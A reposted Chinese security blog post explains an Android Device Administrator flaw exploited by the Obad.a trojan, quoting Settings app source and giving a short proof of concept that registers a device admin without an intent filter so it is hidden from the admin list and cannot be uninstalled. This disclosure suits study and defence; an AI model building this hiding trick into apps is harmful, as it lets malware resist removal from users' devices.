一、漏洞描述

目前被称为“史上最强Android木马”的病毒Backdoor.AndroidOS.Obad.a利用Android设备管理器漏洞使用户无法通过正常方式卸载。其实该漏洞早在去年底已被发现。(http://www.anguanjia.com/?c=news_view&id=435

注册为“设备管理器”的应用是无法被直接卸载的。只有取消激活“设备管理器”后才可以直接卸载。

 木马可以利用Android设备管理器漏洞达到在设备管理器列表“隐身”的效果。这样用户就无法进去“取消激活”页面,从而达到无法卸载的目的。

二、影响版本

android2.2及以上

三、漏洞原理

首先我们来看一下Settings app如何形成设备管理器列表的:

相关类:

 packages\apps\settings\src\com\android\settings\DeviceAdminSettings.java  

 public class DeviceAdminSettings extends ListFragment {

     DevicePolicyManager mDPM;

     final HashSet<ComponentName> mActiveAdmins = new HashSet<ComponentName>();

     final ArrayList<DeviceAdminInfo> mAvailableAdmins = new ArrayList<DeviceAdminInfo>();

     @Override

     public void onResume() {

         super.onResume();

         updateList();

     }

     void updateList() {

         mActiveAdmins.clear();

         List<ComponentName> cur = mDPM.getActiveAdmins();

         if (cur != null) {

             for (int i=0; i<cur.size(); i++) {

                 mActiveAdmins.add(cur.get(i));

             }

         }

         mAvailableAdmins.clear();

         List<ResolveInfo> avail = getActivity().getPackageManager().queryBroadcastReceivers(

                 new Intent(DeviceAdminReceiver.ACTION_DEVICE_ADMIN_ENABLED),

                 PackageManager.GET_META_DATA);// 通过查询广播Intent Filter为”android.app.action.DEVICE_ADMIN_ENABLED“来得到可用的设备管理器程序列表

         int count = avail == null ? 0 : avail.size();

         for (int i=0; i<count; i++) {

             ResolveInfo ri = avail.get(i);

             try {

                 DeviceAdminInfo dpi = new DeviceAdminInfo(getActivity(), ri);

                 if (dpi.isVisible() || mActiveAdmins.contains(dpi.getComponent())) {

                     mAvailableAdmins.add(dpi);

                 }

                 //如果应用已激活设备管理器&&注册了含Intent Filter为”android.app.action.DEVICE_ADMIN_ENABLED“就出现在可用设备管理器列表

             } catch (XmlPullParserException e) {

                 Log.w(TAG, "Skipping " + ri.activityInfo, e);

             } catch (IOException e) {

                 Log.w(TAG, "Skipping " + ri.activityInfo, e);

             }

         }

         getListView().setAdapter(new PolicyListAdapter());

     }

    .......

     class PolicyListAdapter extends BaseAdapter {

       .......

         public void bindView(View view, int position) {

             final Activity activity = getActivity();

             ViewHolder vh = (ViewHolder) view.getTag();

             DeviceAdminInfo item = mAvailableAdmins.get(position);//显示mAvailableAdmins中数据

             vh.icon.setImageDrawable(item.loadIcon(activity.getPackageManager()));

             vh.name.setText(item.loadLabel(activity.getPackageManager()));

             vh.checkbox.setChecked(mActiveAdmins.contains(item.getComponent()));

             try {

                 vh.description.setText(item.loadDescription(activity.getPackageManager()));

             } catch (Resources.NotFoundException e) {

             }

         }

     }

 }

由Android Settings App源代码可以看出,设备管理器列表显示可用的设备管理器程序是通过查询: “IntentFilter动作为 android.app.action.DEVICE_ADMIN_ENABLED” ,且具备“<meta-data android:name="android.app.device_admin" android:resource="@xml/xxx" />”的Receiver来得到的。

对于注册设备管理器,并不需要Intent Filter,只需要meta-data就可以。

如果想在设备管理器列表中”隐身“,只要不带Intent Filter注册设备管理器,就会导致用户无法取消设备管理器的激活,也就无法卸载该app。

四、POC代码
 AndroidMainfest.xml文件注册组件:

 <receiver Android:name=".deviceAdminReceiver" android:label="@string/app_name"

    Android:description="@string/description" android:permission="android.permission.BIND_DEVICE_ADMIN"> 

    <meta-data Android:name="android.app.device_admin"

                Android:resource="@xml/device_admin" /> 

 </receiver>

java代码注册激活设备管理器:

 Intent intent = new Intent(DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN);

 ComponentName  mDeviceComponentName = new ComponentName("packagename","packagename.deviceAdminReceiver");

 intent.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN,

        mDeviceComponentName);

 this.startActivity(intent,0);

五、相关链接
      http://www.anguanjia.com/?c=news_view&id=435
      http://blog.csdn.net/jiazhijun/article/details/9045773

本文转自http://blog.csdn.net/androidsecurity/article/details/9124747

Android设备管理器漏洞(转)的更多相关文章

  1. Android设备管理器漏洞2--禁止用户取消激活设备管理器

    2013年6月,俄罗斯安全厂商卡巴斯基发现了史上最强手机木马-Obad.A.该木马利用了一个未知的Android设备管理器漏洞(ANDROID-9067882),已激活设备管理器权限的手机木马利用该漏 ...

  2. (转)关于android设备管理器的一些分析

    转自http://bbs.pediy.com/showthread.php?t=183692 想必很多人都知道轰动一时android木马OBAD,该木马利用android设备管理器的漏洞,当用户激活设 ...

  3. Android 设备管理器 阻止用户取消激活

    该方案测试可行,系统版本4.4.2.它算是借助android系统的一个bug,不确定在后续更高的版本中是否修复. 该功能和360防卸载功能一样的实现原理. 主要的参考资料是:http://bbs.pe ...

  4. Android设备管理器——DevicePolicyManager

    自从安卓2.2(API=8)以后,安卓手机是通过设备管理API对手机进行系统级的设备管理. 本篇通过大家熟悉的"一键锁屏"的小项目实现来介绍设备管理API如何通过强制设备管理策略创 ...

  5. Android设备管理器 DevicePolicyManager

    设备管理器有个特点,你注册了之后如果不解除注册就会难以卸载带有设备管理器的应用,目前4.3版本仍未提示用户如何卸载,maybe later. 在「设定-安全」你可以看见「设备管理器」,它提供一些高级功 ...

  6. Android Device Administration 设备管理器——实现一键锁屏

    Android Device Administration 设备管理器--实现一键锁屏 最近研究了一下安全这一块的内容,当然,我是比较水的,所以也拿不出什么好知识点,但是有一些冷门的东西我还是可以聊聊 ...

  7. 关于android的设备管理器-DevicePolicyManager(二)

    上回分析到了/data/system/device_policies.xml这个文件是在package change事件发生的时候变化的.那么来看看它的内容. 依据以往的经验.在/data/syste ...

  8. Android学习笔记_61_手机安全卫士知识点归纳(1)状态/形状图形 GPS 设备管理器DeviceAdminReceiver ImageView属性

    1.在做程序自动安装更新的时候 ,必须保证程序的签名和包名是相同.  C:\Documents and Settings\zehua\.android  \ debug.keystore  debug ...

  9. 关于android的设备管理器-DevicePolicyManager(一)

    在Andorid的设置->安全里面有个设备管理器的选项,相信大部分android用户都不太会去注意这个东西.近期在安装了一个应用之后发现这个里面的东西变了.怎么回事呢,研究研究看看.</s ...

随机推荐

  1. sql语句查找某一列的值得最大值。

    记录一下:sql语句查找某一列的值得最大值. 1.例如我要查找 表A中a列的最大值: 查找语句可以这么写: "select Max(a) a from A" 2.查找表A中a列中包 ...

  2. Laravel安装教程

    1.Call to undefined function Illuminate\Encryption\openssl_cipher_iv_length() 报这个错是因为Apache/bin目录下 l ...

  3. 初识java内存区域

    目录: 1.运行时数据区域 2.对象的创建 3.对象的内存布局 4.对象的访问定位 一.运行时数据区域 基本的java虚拟机运行时数据区如下图: 下面我们就来逐个认识这几个运行时的数据区域 1.程序计 ...

  4. python基础学习14----正则表达式

    正则表达式是对字符串操作的一种逻辑公式,就是用事先定义好的一些特定字符.及这些特定字符的组合,组成一个“规则字符串”,这个“规则字符串”用来表达对字符串的一种过滤逻辑. 在python中正则表达式被封 ...

  5. Hadoop 命令 && Web UI

    0. 说明 Hadoop 命令合集 && Web UI 1. HDFS 命令 [1.0 启动所有 && 关闭所有进程] 相当于启动 HDFS 和 YARN # 启动所有 ...

  6. Java 重写 hashCode() 和 equals() 方法

    1. hashCode 1.1 基本概念 hashCode 是 JDK 根据对象的地址算出来的一个 int 数字(对象的哈希码值),代表了该对象再内存中的存储位置. hashCode() 方法是超级类 ...

  7. 【转】Linux下从TCP状态机,三次握手判断DDOS攻击

    从TCP状态机判断DDOS攻击 一.TCP协议 TCP 协议是传送层的核心协议,提供了可靠面向连接的协议,分为三次握手和四次断开,在这个过程中TCP有个状态机,记录不同阶段的状态. 二. TCP握手和 ...

  8. MongoDB基础之 安装

    本篇来介绍MongoDB的安装.安装版本是3.4.18 如果安装老版本的mongodb,你会发现安装比较顺利,但是新版本的mongo安装稍微麻烦一点 ,主要是多了安全机制认证等步骤. 1.下载mong ...

  9. git bash安装和基本设置

    Part1:安装步骤 1.下载地址: https://git-for-windows.github.io/ 2.下载完成后安装,安装路径自己选择,其他的选项参照下图: 其他的一步一步往下即可,最后Fi ...

  10. Spring Boot session与cookie的使用

    Session import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpSession; import ...